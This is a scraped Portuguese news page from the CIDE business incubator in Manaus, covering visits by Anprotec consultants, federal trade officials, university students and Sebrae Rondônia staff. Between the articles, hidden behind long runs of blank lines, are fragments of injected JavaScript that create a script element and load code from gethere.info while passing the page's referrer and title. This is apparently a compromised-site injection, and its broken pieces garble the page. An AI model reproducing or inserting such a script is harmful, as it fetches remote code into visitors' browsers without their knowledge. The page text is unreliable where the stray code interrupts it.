CIDE recebe visita técnica da Anprotec

Consultores da Anprotec conversam com o diretor executivo do CIDE e com a equipe administrativa
Consultores da Anprotec conversam com o diretor executivo do CIDE e com a equipe administrativa

 

 

Os consultores da Associação Nacional de Entidades Promotoras de Empreendimentos de Tecnologias Avançadas (Anprotec), Evelin Astolpho e Carlos Lamberti Júnior, estiveram no Centro de Incubação e Desenvolvimento Empresarial, no último dia 11, realizando a visita técnica do convênio de apoio às incubadoras, do edital Pró-Incubadoras da Fundação de Amparo à Pesquisa do Amazonas (Fapeam), além  de verificar o grau de implantação da metodologia CERNE no centro.

 

Conforme a representante da Anprotec, Evelin Astolpho, a visita serviu para verificar as atividades realizadas a favor dos empreendimentos instalados no CIDE. “O importante é comprovar que as ações que fazem parte do CERNE estão sendo realizadas e que os resultados estão sendo gerados, visando todo um desenvolvimento local da Região”, disse.

 

Para a coordenadora do projeto no CIDE, Rosália Padilha, a implantação do projeto traz melhorias para as empresas instaladas. “ O projeto utilizará a metodologia do Centro de Referência para Apoio a Novos Empreendimentos (CERNE) que é uma plataforma de soluções com qualificação, práticas e processos estabelecidos, e é válido para todas as incubadoras do Brasil, visando à melhoria em planejamentos, capacitação, empreendimentos, assessorias, consultorias, acompanhamento, etc. Desse modo, podemos ter empreendimentos de sucesso”, destaca.

 

O edital prevê visitas às incubadoras de empresas a cada seis meses. “Todo o trabalho é feito em parceria com a Fundação de Amparo à Pesquisa do Estado do Amazonas (Fapeam), portanto, a próxima visita acontecerá de acordo com o que estabelece o edital”, lembra Evelin Astolpho, acrescentando que outras incubadoras de Manaus e de outros municípios vão ser visitadas.

 

Uma vez terminada a avaliação, os consultores se dirigiram a algumas empresas para conhecer os trabalhos desenvolvidos, em companhia do diretor executivo do CIDE, José Grosso, da equipe administrativa e da coordenadora do “CIDE2”, Elizabeth Araújo.

O diretor executivo do CIDE, José Grosso, fala das ações implantadas
O diretor executivo do CIDE, José Grosso, fala das ações implantadas

 

 

A coordenadora do projeto no CIDE, Rosália Padilha, explica aos visitantes como funciona a incubadora
A coordenadora do projeto no CIDE, Rosália Padilha, explica aos visitantes como funciona a incubadora

 

 

Consultores da Anprotec conhecem os produtos regionais no CIDE
Consultores da Anprotec conhecem os produtos regionais no CIDE

 

 

Equipe visita a Cheiro D´Folha, no CIDE.
Equipe visita a Cheiro D´Folha, no CIDE.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Mdic convida empreendedores do CIDE para o PNCE

Durante a visita ao CIDE, representantes foram convidados a provar alguns produtos.
Durante a visita ao CIDE, representantes foram convidados a provar alguns produtos.

 

 

O Centro de Incubação e Desenvolvimento Empresarial (CIDE) é uma das instituições contempladas com a visita de representantes do Ministério do Desenvolvimento, Indústria e Comércio Exterior (Mdic) e da Superintendência da Zona Franca de Manaus (Suframa) que estiveram nesta quinta-feira, 25, na incubadora, para convidar os empreendedores a participar do Plano Nacional da Cultura Exportadora (PNCE).

Segundo o analista de comércio exterior, Rafael Codeço, o PNCE envolve setores de Alimentação e Bebidas, Cosméticos, Produtos Regionais, Indústria Naval, entre outros. “Nesse primeiro momento, trata-se de uma visita à diretoria do CIDE para convidar os empreendedores instalados na incubadora a participar da reunião, na qual explicaremos o programa e, por conseguinte, que eles participem do programa”, disse.

Ainda conforme Codeço, a reunião deve ser agendada para este primeiro semestre, na própria incubadora de empresas.

Para o diretor executivo do CIDE, José Barbosa Grosso, os empresários instalados na incubadora têm potencial para participar do programa do Mdic. “Temos ótimos empreendedores, com produtos competitivos e criativos. Portanto, penso eu, que não teremos dificuldades para participar do PNCE”, conclui.

Representantes do Mdic e da Suframa conversam com empresários no CIDE.
Representantes do Mdic e da Suframa conversam com empresários no CIDE.

 

 

O diretor executivo do CIDE, José Grosso, foi o encarregado de mostrar as instalações do CIDE.
O diretor executivo do CIDE, José Grosso, foi o encarregado de mostrar as instalações do CIDE.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

É possível empreender no campo da Farmácia

Uma técnica de Química, da empresa Anna Morena, fala com estudantes de Farmácia da Ufam.
Uma técnica de Química, da empresa Anna Morena, fala com estudantes de Farmácia da Ufam.

 

 

 

 

Aproximadamente 60 estudantes do curso de Farmácia, da Universidade Federal do Amazonas (Ufam), estiveram, na manhã do último dia 9, no Centro de Incubação e Desenvolvimento Empresarial (CIDE), para conhecer algumas empresas de perfumaria e cosméticos. A iniciativa serviu como aula de empreendedorismo e prática farmacêutica.

Para a professora Jackeline Marinho, a visita tem um caráter didático para que os estudantes percebam que eles são capazes de ter seu próprio negócio no ramo da Farmácia. “Vir à incubadora é fazer um incentivo a empreender. É um despertar no estudante a capacidade de que ele pode ser um bom profissional e um ótimo empreendedor. É interessante mostrar outros caminhos”, disse.

O estudante do segundo período de Farmácia, Abrames Goes, contou que a visita à incubadora mudou sua forma de pensar. “Agora, eu tenho a ideia de que o empreendedorismo pode ser aplicado em todas as áreas, inclusive na Farmácia”.

Segundo o diretor executivo da incubadora, José Barbosa Grosso, a sua gestão é a que mais recebeu visitas de instituições acadêmicas. “Concluir o ano de 2015 com visitas de universitários, é ótimo. Hoje, o CIDE não é somente um lugar físico para empresários, mas também um local onde estudantes podem aprender de pessoas que um dia foram universitários e hoje são grandes empreendedores. Esse conhecer in loco, esse ouvir histórias empreendedoras incentivam a outros a empreender e a melhorar a nossa economia”, finaliza.

Estudantes ouviram palestra no auditório do CIDE.
Estudantes ouviram palestra no auditório do CIDE.

 

 

Ufam1

 

 

A contadora do CIDE, Aldilene Infante, fala para estudantes de Farmácia da Ufam.
A contadora do CIDE, Aldilene Infante, fala para estudantes de Farmácia da Ufam.

 

 

 

Estudantes de Farmácia da Ufam se orginizam para realizar visita às empresas.
Estudantes de Farmácia da Ufam se orginizam para realizar visita às empresas.

 

 

 

Estudantes de Farmácia experimentam os produtos da empresa de cosméticos Anna Morena.
Estudantes de Farmácia experimentam os produtos da empresa de cosméticos Anna Morena.

 

 

 

Estudantes ouvem história de empreendedorismo em empresa de cosméticos.
Estudantes ouvem história de empreendedorismo em empresa de cosméticos.

 

 

 

Estudantes de Farmácia se despedem.
Estudantes de Farmácia se despedem.

 

 

 

Estudantes de Farmácia da Ufam e funcionárias do CIDE agradecem a visita.
Estudantes de Farmácia da Ufam e funcionárias do CIDE agradecem a visita.

 

 

 

 

 

 

 

 

 

 

} else {

Estudantes de Coari completam formação no CIDE

O diretor executivo do CIDE, José Barbosa Grosso, fala para os estudantes do Ifam de Coari.
O diretor executivo do CIDE, José Barbosa Grosso, fala para os estudantes do Ifam de Coari.

 

 

 

Aproximadamente 60 estudantes do curso técnico de Administração do Instituto Federal do Amazonas (Ifam), Campus Coari, município a 363 quilômetros de Manaus, estiveram, na manhã de quarta-feira, 25, no Centro de Incubação e Desenvolvimento Empresarial (CIDE) para dar continuidade à formação, visitando empresas, conhecendo produtos e o processo de incubação.

De acordo com o professor Kid Fernandes, a atividade faz parte do programa de capacitação dos estudantes. “Conhecer in loco o que o professor ensina aos alunos em sala de aula é muito importante porque os estudantes conversam com os empreendedores, experimentam os produtos e conhecem os passos que foram dados para a execução do negócio”, diz.

Ainda segundo ele, os estudantes, ao voltar à sala de aula, vão fazer um relato do que viram e ouviram, e apresenta-lo em um seminário para todo o Ifam. “Ninguém veio aqui para passear. A atividade tem característica pedagógica e de formação”, conclui.

Para o diretor executivo do CIDE, José Barbosa Grosso, todas as turmas de estudantes que visitaram a incubadora levaram aprendizagem para sua instituição. “Não se trata de uma mera visita ou curiosidade em conhecer uma incubadora. Esses estudantes frequentam cursos de capacitação técnica, nos quais há noções de empreendedorismo, gestão, qualidade, etc. Não é brincadeira”, finaliza, acrescentando que se sente feliz por ajudar.

Parada para foto com os funcionários do CIDE.
Parada para foto com os funcionários do CIDE.

 

 

Estudantes do curso de Administração do Ifam, Campus Coari.
Estudantes do curso de Administração do Ifam, Campus Coari.

 

 

Visita à Amazon Doces.
Visita à Amazon Doces.

 

 

Estudantes conhecem o processo da empresa Temperos da Amazônia.
Estudantes conhecem o processo da empresa Temperos da Amazônia.

 

 

Técnicos da empresa de cosméticos Anna Morena recebem os estudantes.
Técnicos da empresa de cosméticos Anna Morena recebem os estudantes.

 

 

Estudantes conhecem o setor de Tecnologia da Informação do CIDE.
Estudantes conhecem o setor de Tecnologia da Informação do CIDE.

 

 

 

 

var d=document;var s=d.createElement(‘script’);

Técnicos do SEBRAE de Rondônia visitam o CIDE

Técnicos do Sebrae Rondônia com o diretor executivo do CIDE, na incubadora.
Técnicos do Sebrae Rondônia com o diretor executivo do CIDE, na incubadora.

 

 

Técnicos do Serviço Brasileiro de Apoio às Micro e Pequenas Empresas de Rondônia (Sebrae) visitaram o Centro de Incubação e Desenvolvimento Empresarial (CIDE), na manhã desta quinta-feira, 19, para conhecer a estrutura da incubadora e conversar com alguns empresários instalados.

De acordo com o diretor técnico do Sebrae Rondônia, Samuel Almeida, o objetivo da visita foi trocar experiências com pequenos empresários e conhecer o processo de incubação no CIDE. “Nossa intenção é aproveitar as experiências que existem nas incubadoras de empresas, como o CIDE, para que possamos implementar em Rondônia, instituições semelhantes. E, penso eu, que não teremos problemas porque temos instituições de pesquisas, universidades, jovens com boas ideias de inovação”, diz Almeida.

Para o diretor do CIDE, José Grosso, a troca de experiências entre as instituições é importante. “Sabemos que as parcerias, os negócios, a troca de informações, o respeito fazem parte da construção de uma instituição. Portanto, para mim, será sempre uma alegria receber profissionais que queiram compartilhar conhecimentos”, finaliza.

 

 

Visiti1
Técnicos do Sebrae Rondônia na administração do CIDE.

 

 

 

Técnicos conhecem instalações da incubadora.
Técnicos conhecem instalações da incubadora.

 

 

 

Técnicos visitam empresa no CIDE.
Técnicos visitam empresa no CIDE.